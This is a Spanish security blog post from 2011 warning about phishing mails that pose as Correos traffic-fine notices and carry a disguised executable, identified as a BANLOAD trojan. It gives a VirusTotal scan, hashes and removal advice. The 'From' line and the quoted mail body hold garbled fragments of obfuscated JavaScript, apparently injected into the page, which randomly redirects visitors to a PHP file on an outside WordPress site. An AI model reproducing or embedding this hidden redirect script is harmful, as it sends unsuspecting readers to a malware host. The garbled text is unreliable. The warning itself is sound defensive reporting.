Cuidado con los mails de MULTAS DE TRAFICO !!! (posible cazapasswords bancario)
Otra vez se están recibiendo mails que aparentan venir de Correos sobre una multa de tráfico posiblemente extraviada:
MAIL MALICIOSO:
_______________
Asunto: Notificación Multa de Tráfico
De: “Oficina de Correos” <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:info@correos.es”>info@correos.es
Prioridad: Normal
______________________________________________________________________________
Te ha llegado una nueva carta con la nueva modalidad de Correos online.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/pdf_ico.png” alt=”” width=”43″ height=”48″ /> Ver carta.</p>
<p>Asun<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to: Correo certificado extraviado.
Tamaño: 60kb
© Copyright 2011 Sociedad Estatal Correos y Telégrafos, S.A.
__________
Preanalisis con VT:
File name:
carta-id-384275.pdf.exe
Submission date:
2011-07-03 08:46:27 (UTC)
Current status:
finished
Result:
6 /42 (14.3%)
VT Community
malware
Safety score: 0.0%
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.07.03.00 2011.07.02 –
AntiVir 7.11.10.199 2011.07.02 TR/Dropper.Gen
Antiy-AVL 2.0.3.7 2011.07.03 –
Avast 4.8.1351.0 2011.07.02 –
Avast5 5.0.677.0 2011.07.03 –
AVG 10.0.0.1190 2011.07.02 –
BitDefender 7.2 2011.07.03 Gen:Trojan.Heur.VB.dm0@cWD84DKi
CAT-QuickHeal 11.00 2011.07.03 –
ClamAV 0.97.0.0 2011.07.03 –
Commtouch 5.3.2.6 2011.07.02 –
Comodo 9259 2011.07.03 –
DrWeb 5.0.2.03300 2011.07.03 –
eSafe 7.0.17.0 2011.06.29 –
eTrust-Vet 36.1.8421 2011.07.01 –
F-Prot 4.6.2.117 2011.07.02 –
F-Secure 9.0.16440.0 2011.07.03 Gen:Trojan.Heur.VB.dm0@cWD84DKi
Fortinet 4.2.257.0 2011.07.02 –
GData 22 2011.07.03 Gen:Trojan.Heur.VB.dm0@cWD84DKi
Ikarus T3.1.1.104.0 2011.07.03 –
Jiangmin 13.0.900 2011.07.02 –
K7AntiVirus 9.107.4863 2011.07.01 –
Kaspersky 9.0.0.837 2011.07.03 UDS:DangerousObject.Multi.Generic
McAfee 5.400.0.1158 2011.07.03 –
McAfee-GW-Edition 2010.1D 2011.07.03 –
Microsoft 1.7000 2011.07.03 –
NOD32 6260 2011.07.03 a variant of Win32/VB.PYN
Norman 6.07.10 2011.07.03 –
nProtect 2011-07-03.01 2011.07.03 –
Panda 10.0.3.5 2011.07.02 –
PCTools 8.0.0.5 2011.07.01 –
Prevx 3.0 2011.07.03 –
Rising 23.64.04.03 2011.07.01 –
Sophos 4.67.0 2011.07.03 –
SUPERAntiSpyware 4.40.0.1006 2011.07.03 –
Symantec 20111.1.0.186 2011.07.03 –
TheHacker 6.7.0.1.247 2011.07.03 –
TrendMicro 9.200.0.1012 2011.07.03 –
TrendMicro-HouseCall 9.200.0.1012 2011.07.03 –
VBA32 3.12.16.4 2011.07.01 –
VIPRE 9756 2011.07.03 –
ViRobot 2011.7.2.4546 2011.07.02 –
VirusBuster 14.0.106.1 2011.07.02 –
Additional information
MD5 : 2f3b93cb68a4e32952690d161d2dab50
SHA1 : 80259067eaccfda30e840ec77fc9ac2653a53392
File size : 61440 bytes
publisher….: Microsoft
copyright….: n/a
product……: MediaPlayer
description..: n/a
original name: vBot23.exe
internal name: vBot23
file version.: 1.00
Como puede verse el tamaño es de 61440 bytes, tiene doble extension .pdf.exe , en PROPIEDADES indica ser del MediaPlayer de Microsoft y el MD5 es 2f3b93cb68a4e32952690d161d2dab50 , con lo cual puede detectarse y eliminarse con nuestro ELIMD5.EXE
Mañana lunes, cuando volvamos al trabajo en SATINFO, lo monitorizaremos y pasaremos a controlar con el ELISTARA 23.55, posiblemente como variante del anterior que llegaba de similar modo:
https://blog.satinfo.es/?p=16954
Si se ha recibido, y aun no se ha ejecutado, eliminarla de la bandeja de entrada, pero si ya se ha ejecutado el fichero anexado, puede probarse si el ELISTARA ya lo controla o aparca (segun version) y sino, aparcarlo con el ELIMD5, mientras pasamos a controlarlo y eliminarlo
Y como siempre, recordar que no deben ejecutarse ni ficheros ni links anexados a e-mails !!!
saludos
ms, 3-7-2011
ANEXO
ConfIrmado que se trata de una variante de BANLOAD, que pasamos a controlar desde el ELISTARA 23.55, que estará disponible en nuestra web a partir de las 19 h CEST de hoy
ms, 4-7-2011
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.